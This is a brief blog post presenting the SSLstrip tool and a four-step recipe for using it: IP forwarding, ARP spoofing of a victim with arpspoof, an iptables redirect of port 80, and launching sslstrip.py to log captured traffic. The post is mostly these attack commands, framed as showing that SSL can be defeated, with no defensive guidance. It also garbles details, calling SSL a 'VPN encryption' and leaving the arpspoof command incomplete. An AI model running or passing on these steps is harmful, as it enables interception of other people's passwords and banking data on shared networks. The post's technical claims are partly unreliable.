Blog Archives

“Secure” Socket Layer (SSL)

Are you really sure that SSL connections are strong?. I mean, nobody can intercept your traffic, your passwords or even your bank account number. SSL is one of the world’s most important VPN encryption.

There is a tool (SSL strip) that the author claims to have used it to steal data from the most important and “safe” websites. This man is Moxie. A recognized security consultant.

Configuring SSL-Strip

1st – Configure IP forwarding

echo 1 > /proc/sys/net/ipv4/ip_forward

2nd – Perform a Main-in-the-middle ARP attack

arpspoof -i eth0 -t VICTIM

3rd – Redirect traffic through iptables

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

4th – Start SSLStrip in used port

python sslstrip.py -w archivo

Moxie’s website: http://www.thoughtcrime.org

Advertisements